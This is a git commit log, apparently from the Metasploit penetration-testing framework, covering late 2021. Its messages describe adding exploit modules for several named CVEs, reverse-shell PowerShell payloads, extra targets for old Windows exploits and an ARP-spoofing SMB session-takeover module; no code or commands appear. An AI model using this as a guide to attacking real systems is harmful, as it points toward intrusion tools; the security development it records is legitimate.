adfoster-r7 bfce4dcc3a Add April fools module help banner 2021-12-04 15:32:38 +00:00
Metasploit 048ea67270 automatic module_metadata_base.json update 2021-12-03 07:25:11 -06:00
adfoster-r7 7dd5d5d3c2 Land #1585, Fix SMB SpiderShare Enum 2021-12-03 13:07:09 +00:00
usiegl00 260ea0725c Update smb_shadow module and docs for review
Add mutex to module to prevent race condition. Add sleep to after arp
query to prevent arp cache restoration. Add DefangedMode to indicate
system network changes. Change module INTERFACE option to be explicit.
Remove unnecessary module payload parameters. Add module Notes.
2021-12-03 14:33:40 +09:00
Metasploit f1b77e24f3 Bump version of framework to 6.1.18 2021-12-02 12:05:14 -06:00
Metasploit 978fc487bb automatic module_metadata_base.json update 2021-12-02 11:01:28 -06:00
dwelch-r7 12b4274cb7 Land #15822, Add Overlay fs local privilege escalation 2021-12-02 16:43:34 +00:00
Brendan Coles a60c59c3af ms08_067_netapi: Add nine Windows 2003 SP2 targets for various locales
* Windows 2003 SP2 Portuguese (NX)
* Windows 2003 SP2 Chinese - Simplified (NX)
* Windows 2003 SP2 Czech (NX)
* Windows 2003 SP2 Dutch (NX)
* Windows 2003 SP2 Hungarian (NX)
* Windows 2003 SP2 Italian (NX)
* Windows 2003 SP2 Russian (NX)
* Windows 2003 SP2 Swedish (NX)
* Windows 2003 SP2 Turkish (NX)
2021-12-02 16:33:02 +00:00
bwatters 6c3a29077f Update rm -rf string to be less fragile 2021-12-02 10:31:47 -06:00
bwatters 77812ae4c4 Update documentation for multiple binaries, add targeting data,
other bcoles improvements
2021-12-02 09:57:48 -06:00
bwatters 620b2d2b12 Update targeting selection and payloads, fix python cmd_exec 2021-12-02 08:03:03 -06:00
adfoster-r7 db2ac2d4c1 Land #15928, bump ruby 3.0 2021-12-02 13:48:45 +00:00
adfoster-r7 a3f354af23 Add favicon, guidelines to the nav, remove edit link, and cruft 2021-12-02 03:32:08 +00:00
adfoster-r7 066087a8bd Updated Git cheatsheet (markdown) 2021-12-02 01:44:01 +00:00
adfoster-r7 6efacd543f Update link directly to nightly installers 2021-12-01 22:46:01 +00:00
adfoster-r7 dd8659532d Change NT:LM to NTLM 2021-12-01 22:41:48 +00:00
bwatters 47aacbdf32 Fix cmd_exec to be friendly with binary and python meterpreters
Add arch checks for payload/target
2021-12-01 16:18:49 -06:00
bwatters a3f2d5468a Add some quick debugging output 2021-12-01 14:54:48 -06:00
bwatters 18cc2ef516 Add support for aarch64 Ubuntu versions 2021-12-01 14:54:48 -06:00
bwatters 1f33305ce1 Add documentation 2021-12-01 14:54:48 -06:00
bwatters c6e2be2cd7 Ensure deletion of exploit and payload even if the exploit fails. 2021-12-01 14:54:48 -06:00
bwatters b1f6937542 Updated exploit to compile on target, added control over directory creation
Added a method to get source code for the write and compile method
2021-12-01 14:54:47 -06:00
bwatters eba7803e1a Add check method 2021-12-01 14:54:47 -06:00
bwatters bf1b3b377c Add cve-2021-3493 module 2021-12-01 14:54:47 -06:00
Jeffrey Martin e8ed34d204 bump docker image to match .ruby-version 2021-12-01 12:21:25 -06:00
Jeffrey Martin 0d513fb9a7 bump ruby 3.0
Update the default ruby version
2021-12-01 12:02:59 -06:00
Tim W 0807de6b0f Land #15917, fix readline error when two options only differ in case 2021-12-01 06:01:38 +00:00
adfoster-r7 d178b6b267 Raise instead of warn 2021-12-01 03:07:07 +00:00
adfoster-r7 9cffee8263 Allow build script to serve files too 2021-12-01 03:07:07 +00:00
adfoster-r7 3f922dfdb6 Add initial metasploit docs site, generated from the existing wiki 2021-12-01 03:07:03 +00:00
Ashley Donaldson 0a2780027e Use safe navigation option
Co-authored-by: Grant Willcox <63261883+gwillcox-r7@users.noreply.github.com>
2021-12-01 09:53:26 +11:00
Metasploit 18feefb1e5 automatic module_metadata_base.json update 2021-11-30 11:59:09 -06:00
space-r7 51d85fada5 Land #15914, ms03_026_dcom cleanup 2021-11-30 11:37:43 -06:00
bwatters 999ffa36cc Actually delete extra files 2021-11-30 10:10:30 -06:00
Metasploit ce6f22fdcc automatic module_metadata_base.json update 2021-11-30 02:42:47 -06:00
Tim W abb11cf896 Land #15918, add more targets for ms07_029_msdns_zonename 2021-11-30 08:24:03 +00:00
Brendan Coles 28bc460bac ms07_029_msdns_zonename: Add additional Windows 2000/2003 target offsets 2021-11-30 07:38:08 +00:00
Tim W 9733ced0e4 cleanup and move LOAD_MODULES option to Msf::Payload::Windows::Powershell 2021-11-30 07:06:11 +00:00
Tim W 7eab662674 update documentation 2021-11-30 06:30:59 +00:00
Tim W 5d722d3cfa add non-cmd powershell_reverse_tcp_ssl payloads 2021-11-30 06:30:59 +00:00
Tim W e10eaec84c fix ssl connection on Windows Server 2012 2021-11-30 06:30:59 +00:00
Tim W e5ef1bb7fc rubocop 2021-11-30 06:30:59 +00:00
Tim W 32f272d96a fix the windows/x64/powershell_reverse_tcp handler 2021-11-30 06:30:58 +00:00
Tim W 1fbaca0de2 add documentation 2021-11-30 06:30:58 +00:00
Tim W 1c87495a4a fix ssl payload 2021-11-30 06:30:58 +00:00
Tim W 21d7bc823e fix URL 2021-11-30 06:30:58 +00:00
Tim W 6a57ef4c65 run rubocop on changed files 2021-11-30 06:30:58 +00:00
Tim W 65e3e38721 fix powershell session info 2021-11-30 06:30:58 +00:00
Tim W f351f3804a fix write_file_powershell_fragment on Windows 7 2021-11-30 06:30:58 +00:00
Tim W 9097b181b0 add powershell_reverse_tcp_ssl 2021-11-30 06:30:58 +00:00
Tim W 47eec52f06 minor powerfun improvements 2021-11-30 06:30:58 +00:00
Tim W cb70c8e861 fix #15804, fix powershell read_file on Windows Server 2012 2021-11-30 06:30:58 +00:00
Tim W cd936c92f8 Land #15920, add tab completion to powershell_import command 2021-11-30 06:18:48 +00:00
Tim W 0d5eef029a let the user know the powershell script must end in .ps1 on failure 2021-11-30 06:17:48 +00:00
Brendan Coles c74c4c0292 Land #15913, handle unmatched quotes on command shell sessions 2021-11-30 06:03:24 +00:00
Ashley Donaldson 5e05ce872e Added tab completion to powershell import command 2021-11-30 09:46:12 +11:00
bwatters 14064ff3f9 Update module description and remove extra module. 2021-11-29 15:23:02 -06:00
space-r7 8573ed617a Land #15897, return boolean in write_file() 2021-11-29 13:23:32 -06:00
sjanusz 84c9a30c40 Fix depth check 2021-11-29 17:54:54 +00:00
sjanusz 0ea203fcfe Add rport comment, change table creation, rubocop lint 2021-11-29 17:00:48 +00:00
Tim W a5b88c6844 only return false in write_file for unsupported sessions 2021-11-29 09:46:28 +00:00
Metasploit 543a3f44f5 automatic module_metadata_base.json update 2021-11-28 20:54:48 -06:00
Tim W 1a40fe4bdb Land #15915, rename Windows 2000 SP4 English/French/German/Dutch to Universal 2021-11-29 02:34:30 +00:00
Ashley Donaldson ff0076752f Specifically allow session tab completion to work with its option selection 2021-11-29 13:23:08 +11:00
Ashley Donaldson 607ff2727a Resolve readline error when two options differ only in case 2021-11-29 12:47:28 +11:00
Brendan Coles 8fa73f9e90 ms05_039_pnp: Rename 'Windows 2000 SP4 English/French/German/Dutch' target to 'Windows 2000 SP4 Universal' 2021-11-28 13:39:05 +00:00
Tim W 80e2559f0f Fix #15912, handle unmatched double quote on command shell sessions 2021-11-28 11:51:18 +00:00
Brendan Coles 5fab1da09b ms03_026_dcom: cleanup 2021-11-28 08:25:31 +00:00
sjanusz ce3215e35b Fix broken files check, make return dirs consistent 2021-11-26 12:51:07 +00:00
Metasploit d0e4d15d53 Bump version of framework to 6.1.17 2021-11-25 12:04:33 -06:00
dwelch-r7 afb9cbfb77 Only normalize new/updated hosts after nmap import 2021-11-25 13:46:57 +00:00
sjanusz 147ca34308 Fix empty list check & add return statement to rescue 2021-11-25 11:38:22 +00:00
usiegl00 bfd57daea7 Update Range Syntax to Support Ruby 2.5
Change [?..] to [?..-1] to be compatible with older ruby versions. Fix
failing msftidy rubocop linting tests.
2021-11-25 15:05:39 +09:00
Tim W c7b4a31ae6 modify Post::File tests to check write_file return value 2021-11-25 03:37:06 +00:00
Tim W 9b5e24d55b Fix #12603, create _write_file_meterpreter function 2021-11-25 03:34:17 +00:00
Metasploit d8e9cbdfd1 automatic module_metadata_base.json update 2021-11-24 18:00:22 -06:00
Grant Willcox e21812fa5c Land #15864, fix #15856, fix shell_to_meterpreter to detect x64 windows and return an x64 meterpreter session 2021-11-24 17:41:31 -06:00
usiegl00 e19511a31c Update documentation for the smb_shadow module.
Add additional clarity and details to the existing documentation for the
smb_shadow module. Remove some outdated comments and fix some spelling
errors.
2021-11-25 08:12:13 +09:00
Grant Willcox 1b9f9f0620 Add in final review fixes to handle Windows ARM if ever encountered 2021-11-24 16:37:21 -06:00
Metasploit 42fa45fdcf automatic module_metadata_base.json update 2021-11-24 13:45:30 -06:00
Spencer McIntyre 9cf16e68b9 Land #15874, Add ManageEngine ADSelfService 2021-11-24 14:25:08 -05:00
sjanusz 1a435f8a77 Working spidering on Windows XP, 7 & 10, DB options work, fix error handling 2021-11-24 17:34:33 +00:00
William Vu 344bdacae4 Remove preferred payload
We'll add it back to Framework later.
2021-11-24 10:44:59 -06:00
suryasaradhi 57427ae1c7 Merge pull request #2 from bwatters-r7/land-15742
Toggle HTTP server
2021-11-24 19:20:24 +05:30
usiegl00 e2734293e1 Add SMB Shadow Module: Direct SMB Session Takeover
This module intercepts direct SMB connections on the LAN.
Both the SMB Server and Client must be on the LAN.
The SMB Client must be authenticating to the Server as an Administrator.
This module is dependent on an external ARP spoofer.
2021-11-24 20:05:30 +09:00
William Vu e8e5467b70 Credit mr_me for keytool classloading technique
Confirmed. :)
2021-11-23 20:12:05 -06:00
William Vu d2c322e875 Revert option name styling in module doc
Bug in our local renderer's styling. GitHub renders it just fine.
2021-11-23 19:05:26 -06:00
William Vu 053dc70782 Add words to module doc 2021-11-23 19:05:09 -06:00
William Vu 3702615003 Improve check precision by matching more stuff 2021-11-23 19:05:09 -06:00
William Vu e2cf3e6706 Clarify working directory for FileDropper 2021-11-23 19:05:09 -06:00
William Vu a8daed1e79 Add module doc 2021-11-23 19:05:09 -06:00
William Vu 2f1bfa738a Add ManageEngine ADSelfService Plus CVE-2021-40539 2021-11-23 19:05:09 -06:00
wvu e89ead9690 Clarify where IgnoreUnknownPayloads applies 2021-11-23 18:39:57 -06:00
Metasploit 6d34b1bc72 automatic module_metadata_base.json update 2021-11-23 12:26:24 -06:00
Grant Willcox 0007887a0c Land #15898, trade URI.encode & URI.escape for Ruby 3 2021-11-23 12:07:48 -06:00
sjanusz 33feba4a7d Adds database configuration debug tests 2021-11-23 17:48:10 +00:00
sjanusz 46611b7fb3 Add database stats to debug command 2021-11-23 17:17:48 +00:00
Metasploit 24ab523de8 automatic module_metadata_base.json update 2021-11-23 08:38:53 -06:00
Tim W d4b478ab71 Land #15899, inform users of meterpreter > shell -it 2021-11-23 14:09:54 +00:00
Spencer McIntyre bfea5137b9 Land #15900, Update Azure AD Login Scanner Docs 2021-11-23 09:01:11 -05:00
Spencer McIntyre 3175494084 Fix a module doc formatting issue 2021-11-23 09:00:10 -05:00
Jeffrey Martin d802a9ee0b remove rubocop exemption no longer required 2021-11-23 07:58:07 -06:00
dwelch-r7 b83e8a2fa7 Tell the user about shell -it 2021-11-23 12:23:03 +00:00
Jeffrey Martin 08a1fb0c8e remove stray comment 2021-11-22 14:39:07 -06:00
Jeffrey Martin 21a6a18d92 trade URI.encode & URI.escape for Ruby 3
Ruby 3 removed the `URI.escape` methods however access to
the a parse for the same RFC is stil available at `URI::DEFAULT_PARSER.escape`.

Per the Ruby forum [comment](https://bugs.ruby-lang.org/issues/17309#note-1) this should equal.
2021-11-22 14:11:03 -06:00
sjanusz 8f7b9c5ad8 Improve disk shares 2021-11-22 12:41:45 +00:00
sjanusz 779881dd55 Add constants & exception handling for RubySMB 2021-11-22 12:36:59 +00:00
sjanusz 107dadf68c Change readme file to show new module changes 2021-11-22 12:36:59 +00:00
sjanusz db4303912a Add fixes 2021-11-22 12:36:59 +00:00
sjanusz eba2df0a8a Fix smb enumshare to work with SMB1/2/3 2021-11-22 12:36:59 +00:00
Tim W bce463fa6a Fix #15896, write_file should return true on success 2021-11-22 04:26:54 +00:00
Matthew Dunn 888a69b911 Update documentation with blog post link and SSO details 2021-11-21 22:35:15 -05:00
Tim W 423810ca5c fix shell_to_meterpreter cmd_exec powershell 2021-11-22 03:11:26 +00:00
Metasploit 5863ff7e35 automatic module_metadata_base.json update 2021-11-18 17:24:22 -06:00
Grant Willcox 7f6d661ff7 Land #15866, Add Exploit For CVE-2021-38294 (Apache Storm Nimbus getTopologyHistory RCE) 2021-11-18 17:02:50 -06:00
Grant Willcox 725c5f8d8c Add in another scenario into documentation and add additional detail to one setup step 2021-11-18 17:01:25 -06:00
Spencer McIntyre d7cb7804e6 Implement some changes from PR feedback 2021-11-18 16:35:13 -05:00
Grant Willcox 7b06ee9701 Land #15889, Add validation for resizeable interactive shells 2021-11-18 14:12:56 -06:00
Grant Willcox 3a9eb24bd3 Land #15887, Respect path expansion when performing path-based tab completion 2021-11-18 12:24:49 -06:00
Metasploit 3534d511af Bump version of framework to 6.1.16 2021-11-18 12:04:17 -06:00
dwelch-r7 3b74021e19 Add validation for resizable interactive shells 2021-11-18 13:05:01 +00:00
Ashley Donaldson 81338225f0 Respect path expansion when performing path-based tab completion 2021-11-18 14:50:22 +11:00
Grant Willcox a915c3ce5c Add fixes for some of the issues raised during the review process on both the documentation and module side of things 2021-11-17 17:25:50 -06:00
Metasploit 163dbf2cc1 automatic module_metadata_base.json update 2021-11-17 15:27:48 -06:00
Grant Willcox 9023c61ac8 Land #15851, User Agent Refresh 2021-11-17 15:08:52 -06:00
Grant Willcox 1d20393452 We should be safe to change the user agent for Google as well since we are communicating with Google's servers and as far as I can tell changing the user agent doesn't really change the results at all 2021-11-17 15:08:27 -06:00
Metasploit f91623cf4b automatic module_metadata_base.json update 2021-11-17 09:13:17 -06:00
Christophe De La Fuente 6c57ee376a Land #15755, Azure Active Directory Login Scanner Module 2021-11-17 15:53:22 +01:00
bwatters 2a68b9ae9f Add targets to track http server status 2021-11-17 07:54:49 -06:00
adfoster-r7 03e13b60f3 Remove indentation 2021-11-17 12:56:37 +00:00
Ashley Donaldson f54f03fc92 Prevent payloads being used if can't clean up files 2021-11-17 15:40:16 +11:00
Matthew Dunn e3423317e0 Merge pull request #1 from jmartin-r7/azure-use-AuthBrute
Use AuthBrute to take advantage of library funcitons and checks
2021-11-16 17:37:11 -05:00
Jeffrey Martin f208e59541 ensure realm reported on credential
remove default DOMAIN to make input required
2021-11-16 15:36:04 -06:00
Jeffrey Martin 8c15fde679 adjust service reporting 2021-11-16 14:23:33 -06:00
Jeffrey Martin 5af7847b52 ensure address in an IP when reporting service 2021-11-16 12:39:41 -06:00
Jeffrey Martin 680f068adc move text encode into XML generation 2021-11-16 12:39:41 -06:00
Jeffrey Martin 7b3c9f9d13 utilize AuthBrute more 2021-11-16 12:34:17 -06:00
adfoster-r7 3d4587b44e Land #15879, Rename local instance variable to thread_list and handle a missing batch_size value on threads 2021-11-16 17:01:53 +00:00
Spencer McIntyre 9fa65092d1 Switch to the new Rex stopwatch function 2021-11-16 10:12:57 -05:00
Jeffrey Martin 4498e5d2e1 add guards for thread variable access 2021-11-16 07:53:51 -06:00
Jeffrey Martin b84b3b73ef use a more descriptive variable name 2021-11-16 07:51:23 -06:00
Ashley Donaldson f020c99a85 Implement suggestions from code review 2021-11-16 11:07:48 +11:00
Grant Willcox d7047cdb6f Land #15867, Update example modules 2021-11-15 15:32:45 -06:00
Jeffrey Martin 8e34a330f1 rename local instance variable for thread list 2021-11-15 15:07:12 -06:00
Grant Willcox a620b425dd Fix a few capitalization errors 2021-11-15 14:56:25 -06:00
Grant Willcox fc05f53688 Reword comments a bit to make it cleare to end users how to use some of the libraries we provide 2021-11-15 14:54:13 -06:00
h00die e2ec4438a4 further update examples 2021-11-15 15:16:08 -05:00
Grant Willcox e65b10c57c Land #15862, Expand environment variables on Linux Meterpreter 2021-11-15 14:15:41 -06:00
Metasploit 359ef2239c automatic module_metadata_base.json update 2021-11-15 13:46:09 -06:00
Spencer McIntyre a100cd77ae Land #15858, Add exploit for CVE-2021-42237 2021-11-15 14:24:47 -05:00
Grant Willcox 2dc3f4050a Land #15878, Better tab completion experience when navigating directories in Meterpreter 2021-11-15 10:50:47 -06:00
Grant Willcox e6f38b3226 Rename dir parameter in Dir.match to match_dir to make more sense with new changes 2021-11-15 10:50:11 -06:00
Metasploit 548789b751 automatic module_metadata_base.json update 2021-11-15 10:04:38 -06:00
Spencer McIntyre b428863d9e Land #15875, Bash payload works outside of bash 2021-11-15 10:46:05 -05:00
Ashley Donaldson 7bf75c0de5 Better support tab completing through a series of directories when using meterpreter 2021-11-15 17:22:38 +11:00
Ashley Donaldson 7549aaaf61 Remove warning now that bash payloads should work in this situation 2021-11-15 15:56:59 +11:00
Ashley Donaldson 40e45bdaed Ensure bash payload executes from a bash context 2021-11-15 14:44:11 +11:00
Ashley Donaldson 90695e8399 Use expand_path in other file/directory-based meterpreter commands 2021-11-15 12:18:56 +11:00
Ashley Donaldson 32bf9f60d1 Explicitly select platforms to manually perform path expansion 2021-11-15 11:44:08 +11:00
h00die 93a1473e49 fix return add http timeout 2021-11-13 04:46:38 -05:00
h00die 69c0c367fe rubocop and example updates 2021-11-13 04:33:24 -05:00
Spencer McIntyre 5fdcdcaaa5 Delay rstream creation until the platform is known 2021-11-12 16:03:29 -05:00
Spencer McIntyre d5e024ae4c Refactor to generic/ssh/interact 2021-11-12 16:03:29 -05:00
Spencer McIntyre 726c5f26e3 SSH session consistency with auto-platform IDing 2021-11-12 16:03:27 -05:00
Spencer McIntyre 87d1e925d0 Add an interactive SSH payload 2021-11-12 16:01:22 -05:00
Spencer McIntyre 0b3f95abca Writeup the module docs and move the protocol code 2021-11-12 15:15:51 -05:00
Spencer McIntyre 1f1e0fc2cc Write and use a check method 2021-11-12 14:08:19 -05:00
Metasploit 0edfe45003 automatic module_metadata_base.json update 2021-11-12 12:09:42 -06:00
Grant Willcox bc7eb48610 Land #15796, Support Pivoted SSL Connections (Server Edition) 2021-11-12 11:47:27 -06:00
space-r7 b6dcb03b45 Land #15843, add Jetty WEB-INF file disclosure 2021-11-12 11:31:27 -06:00
space-r7 9ab969f8fe set default port, change checkcodes 2021-11-12 11:30:42 -06:00
Spencer McIntyre 7284f14fd8 Define custom Thrift types, improve syncing 2021-11-12 10:30:48 -05:00
Spencer McIntyre 21ff65994c Initial commit of the Storm Nimbus cmd exec 2021-11-12 10:30:15 -05:00
Spencer McIntyre 40a4d09c26 Fix SSL support in Meterpreter's TCP server 2021-11-12 09:16:22 -05:00
Spencer McIntyre f1103baf1d Support SSL TCP server channels in SSH 2021-11-12 09:05:17 -05:00
Spencer McIntyre fba2330f0b Support SSL TCP server channels in Meterpreter 2021-11-12 09:05:17 -05:00
Grant Willcox 7e01e33e51 Make the XML generation into a function that accepts an argument and do further cleanup to simplify the code around this 2021-11-11 23:56:11 -06:00
Ashley Donaldson ebd927da44 Apply suggestions from code review
Co-authored-by: Grant Willcox <63261883+gwillcox-r7@users.noreply.github.com>
2021-11-12 11:56:49 +11:00
Metasploit 943de424bd automatic module_metadata_base.json update 2021-11-11 17:23:32 -06:00
bwatters 4505d7e834 Land #15700, Add Aerohive NetConfig <= 10.0r8a RCE (CVE-2020-16152) module
Merge branch 'land-15700' into upstream-master
2021-11-11 17:03:54 -06:00
bwatters 5e670638f3 Add a line suggesting TryToFork on Meterpreter might prevent the hang after exploitation 2021-11-11 16:59:09 -06:00
Grant Willcox 8d55b16ade Fix one more mistake and rename document and module to a more easy to find name 2021-11-11 16:42:58 -06:00
Grant Willcox be4fa90f1a Fix up wvu's review comments 2021-11-11 14:39:40 -06:00
Metasploit 77ab9be4a6 Bump version of framework to 6.1.15 2021-11-11 12:04:49 -06:00
space-r7 f055429189 Land #15806, add BillQuick SQLi module 2021-11-11 11:51:19 -06:00
space-r7 93038f43ce replace fail_with() calls with CheckCode returns 2021-11-11 11:37:55 -06:00
Tim W f2d7f33280 run rubocop on shell_to_meterpreter 2021-11-11 16:00:05 +00:00
Tim W 7bf0fa29fc Land #15859, fix meterpreter case sensitive tab completion 2021-11-11 14:55:22 +00:00
Tim W 7a2eb1cbcb fix #15856, fix shell_to_meterpreter to detect x64 windows and return an x64 meterpreter session 2021-11-11 14:40:18 +00:00
Metasploit 7b4db682a0 automatic module_metadata_base.json update 2021-11-11 05:20:18 -06:00
adfoster-r7 51914ae858 Land #15861, Lint smb enumshares module 2021-11-11 11:01:55 +00:00
sjanusz fb8ea12de8 Lint SMB EnumShares module 2021-11-11 10:46:24 +00:00
Ashley Donaldson e1b8a79c37 Added test cases for environment variable expansion on Linux 2021-11-11 20:44:40 +11:00
Ashley Donaldson 7e2c6edb64 Expand paths for linux platforms 2021-11-11 20:14:06 +11:00
Ashley Donaldson 935eff899a Only perform deduplication if a value is actually returned 2021-11-11 13:17:35 +11:00
Ashley Donaldson 4986583f41 Fix bug in tab completion in case-sensitive situations
Includes a fix for a crash caused when tab completing.
This crash is the result of a bug in rb-readline when the only remaining options
provided in the tab completion procedure are identical. The bug is only triggered
when going case-insensitive, but we can avoid it by de-duping the list sent back to
rb-readline.
2021-11-11 12:09:59 +11:00
Grant Willcox 9d6f0a0eb2 Update XML to reduce it to the bare minimum needed to get the exploit working. Possible I could do more but in my tests it seems everything in here now is needed 2021-11-10 16:25:08 -06:00
Grant Willcox 27310dc002 Add in exploit and documentation for CVE-2021-42237 2021-11-10 15:52:22 -06:00
Tim W 3066c5b05e Revert "Fix bug in tab completion in case-sensitive situations"
This reverts commit 22fb90b258.
2021-11-10 16:44:29 +00:00
Pedro Ribeiro 59d6a25286 Merge branch 'rapid7:master' into master 2021-11-10 23:40:58 +07:00
Tim W 3cce6dac07 Land #15847, fix meterpreter case sensitive tab completion 2021-11-10 16:20:12 +00:00
adfoster-r7 1bff0bebf4 Land #15820, Fix named pipe pivoting 2021-11-10 12:09:43 +00:00
Ashley Donaldson 360a0b866a Updated cached sizes because of new UA string 2021-11-10 17:27:02 +11:00
Ashley Donaldson 527057c700 Updated user agent strings in some modules where it shouldn't impact exploitability 2021-11-10 11:12:38 +11:00
Ashley Donaldson 2447ce3eba Use a random, modern UA string for HTTP payloads 2021-11-10 10:40:32 +11:00
Ashley Donaldson cab04d33f5 Use existing Rex::UserAgent class; keep UA string consistent across an MSF session 2021-11-10 10:05:45 +11:00
h00die 28672f3ea5 review 2021-11-09 16:19:20 -05:00
suryasaradhi d20e1da3df Merge pull request #1 from mekhalleh/docx_mshtml
update modules (auxiliary and exploit)
2021-11-09 23:38:52 +05:30
Metasploit 8cb026d3d3 automatic module_metadata_base.json update 2021-11-09 12:01:52 -06:00
Tim W 0b50f58322 Land #15834, add CVE-2021-40449 CallbackHell Windows LPE 2021-11-09 17:41:07 +00:00
Tim W 1a2ff7ff3d Land #15846, fix meterpreter > download tab completion 2021-11-09 16:54:44 +00:00
Grant Willcox 9f9942feb6 Make adjustments to dllmain.c from reviews and recompile the DLL again 2021-11-09 10:49:14 -06:00
Metasploit 0446820d33 automatic module_metadata_base.json update 2021-11-09 10:49:06 -06:00
Grant Willcox 3af93cbacc Fix up changes from timwr's review so long 2021-11-09 10:36:50 -06:00
Grant Willcox 780a9370a2 First draft of code, documentation, and exploit DLL plus exploit code 2021-11-09 10:36:40 -06:00
space-r7 1dd26bca03 Land #15802, add OMIGOD LPE 2021-11-09 10:30:50 -06:00
Spencer McIntyre 4c937c9a6f Land #15844, Add in new definitions to definitions 2021-11-09 10:50:00 -05:00
Spencer McIntyre 01f71e52df Land #15845, Don't getsystem if already SYSTEM 2021-11-09 08:50:29 -05:00
RAMELLA Sébastien 38973510f7 update modules (auxiliary and exploit) 2021-11-09 15:18:58 +04:00
h00die 8f713d00ae remove period 2021-11-09 04:11:23 -05:00
h00die 0fe49cce22 review comments 2021-11-09 04:04:16 -05:00
Ashley Donaldson 551ef90c5f Use default User agent string for generic auxiliary modules 2021-11-09 18:55:49 +11:00
Ashley Donaldson 839722720a Updated the default metasploit user agent string to be more modern
Selected from a set of currently-modern browser UA strings
2021-11-09 18:20:41 +11:00
Ashley Donaldson d4b0b9c4ab Don't getsystem if we are already SYSTEM 2021-11-09 16:03:55 +11:00
Ashley Donaldson 35a6622318 Tab-complete for file downloads 2021-11-09 10:42:11 +11:00
Ashley Donaldson 22fb90b258 Fix bug in tab completion in case-sensitive situations 2021-11-09 10:18:02 +11:00
Grant Willcox 517b586f8b Add in new definitions to external/source/include/windows/definitions.h including a proper THREADINFOCLASS definition, additional SYSTEM_INFORMATION_CLASS definitions, and a BIG_POOL_INFO definition 2021-11-08 16:46:52 -06:00
h00die 23ba4a1f3a jetty updates 2021-11-08 14:09:43 -05:00
h00die ea59e89cba jetty web-inf file disclosure 2021-11-08 14:04:08 -05:00
Spencer McIntyre b660140210 Land #15840, Change a failure to a warning
Warn instead of failing when running Kiwi's DCSync as SYSTEM since it
can work when the computer account has the necessary privileges.

Resolves #14390
2021-11-08 13:41:27 -05:00
adfoster-r7 eb66b89d99 Rubocop Packrat mixin 2021-11-08 12:12:59 +00:00
Metasploit 33d7a8ae33 automatic module_metadata_base.json update 2021-11-08 04:31:03 -06:00
adfoster-r7 fe9fca4152 Land #15838, sap_router_portscanner: rename validate function 2021-11-08 10:12:30 +00:00
Ashley Donaldson 937e208de8 Give warning rather than failure when running DCSync as SYSTEM 2021-11-08 15:56:29 +11:00
Uli Heilmeier c3c7279de0 sap_router_portscanner: rename validate function
cmd_run of command_dispatcher/auxiliary.rb calls a validate function
without an argument. As the validate function requires a range argument
running the sap_router_portscanner module fails.

Fix this issue by renaming the function.
2021-11-07 20:05:20 +01:00
h00die e067535b72 billquick review updates 2021-11-06 06:29:56 -04:00
h00die 258f38090d no more duplicate text 2021-11-05 15:04:33 -04:00
adfoster-r7 e8a37d88d3 Land#15748, offer Meterpreter helm chart for installation into Kubernetes 2021-11-05 18:33:24 +00:00
Gadi Naor 17df4685e0 Merge pull request #1 from adfoster-r7/meterpreter-helm-chart-tweaks
Meterpreter Helm chart tweaks
2021-11-05 18:32:20 +02:00
adfoster-r7 dc1b4f7d77 Land #15818, Fix Partial WebSocket Reads 2021-11-05 15:59:05 +00:00
Matthew Dunn 5b8b718a3d Use fail_with instead of return 2021-11-05 11:49:02 -04:00
adfoster-r7 ee093d0c21 Meterpreter Helm chart tweaks 2021-11-05 15:14:19 +00:00
Metasploit 9e057dce8f automatic module_metadata_base.json update 2021-11-05 09:54:06 -05:00
Spencer McIntyre bdb497ddd4 Dedent the websocket module 2021-11-05 10:41:07 -04:00
Spencer McIntyre 69e9a53b14 Land #15829, Improve Kubernetes exec reliability 2021-11-05 10:35:40 -04:00
Spencer McIntyre 56a544c184 Fix two minor issues in kubernetes/exec 2021-11-05 10:35:22 -04:00
Metasploit da7e4cb485 automatic module_metadata_base.json update 2021-11-05 07:13:45 -05:00
Christophe De La Fuente 836422f9ac Land #15776, Wordpress automatic plugin aux module 2021-11-05 12:47:27 +01:00
alanfoster 9346a43e4a Improve kube exec reliability 2021-11-05 02:38:44 +00:00
Spencer McIntyre 15e587ec03 Land #15828, Update RDLL template README.md
Update README.md for DLL template injection with some minor additional notes
2021-11-04 17:24:34 -04:00
h00die b39196fd0f review comments 2021-11-04 15:28:05 -04:00
Metasploit 3155f21d77 Bump version of framework to 6.1.14 2021-11-04 12:05:03 -05:00
Grant Willcox ab1316ac10 Update README.md with some minor additional notes
Add in a minor additional note about needing to potentially create one of the directories in case people run into errors as I encountered this during some recent testing.
2021-11-04 12:02:56 -05:00
bwatters 90a1296def Land #15825, Only Warn About Missing CVEs in Exploits
Merge branch 'land-15825' into upstream-master
2021-11-04 08:10:58 -05:00
Metasploit 5f896d3d30 automatic module_metadata_base.json update 2021-11-04 06:29:59 -05:00
Spencer McIntyre 639bf9ffb0 Only warn about missing CVEs in exploit modules 2021-11-04 07:18:27 -04:00
Spencer McIntyre 7844ee2a49 Land #15805, bump metasploit-payloads to 2.0.60 2021-11-04 07:07:23 -04:00
Metasploit 1a2285e1b3 automatic module_metadata_base.json update 2021-11-03 16:17:46 -05:00
Spencer McIntyre 6f4aa55022 Land #15816, GitLab Unauth Command Injection 2021-11-03 16:57:57 -04:00
Jake Baines 4b7c5acc5b Changed qx delimiter to # and added it to badchars. Defaulted to a staged payload 2021-11-03 10:51:37 -07:00
Jake Baines 68cae90f45 Fix spelling error 2021-11-03 08:51:07 -07:00
Jake Baines 116e2b0c1d Enabled use of cmdstager::flavor printf. Tested against a CentOS install. Updated docs. Default to MeterpreterTryToFork and enabled autocheck 2021-11-03 08:49:09 -07:00
Spencer McIntyre a85cd3d5f6 Add logging to get_wsframe 2021-11-03 11:26:31 -04:00
dwelch-r7 d6c08831d6 Fix named pipe pivoting 2021-11-03 14:14:39 +00:00
kalba-security 728965b3c6 fix typos in docs 2021-11-02 20:04:06 -04:00
kalba-security f778f5f00a add cleanup, add new info and warning messages, update docs, small improvements 2021-11-02 19:58:16 -04:00
Spencer McIntyre 3d2fd9bc90 Don't process partial WS frames 2021-11-02 17:13:26 -04:00
Spencer McIntyre 6930200422 Fix partial bindata reads within web sockets 2021-11-02 17:13:13 -04:00
Jake Baines beb30f2b6a Expanded cmdstager flavors. Removed bad variable name 2021-11-02 12:01:36 -07:00
Jake Baines 10bb77ea4b Addressed a wide variety of spelling and formatting issues. Added a reference. Registered TARGETURI. Randomized the image payload in check. Added additional options information to documentation. 2021-11-02 09:50:06 -07:00
Jake Baines b3a6d09b86 Fix wrong extension for documentation 2021-11-02 08:07:56 -07:00
Metasploit 958b0806df automatic module_metadata_base.json update 2021-11-02 09:37:05 -05:00
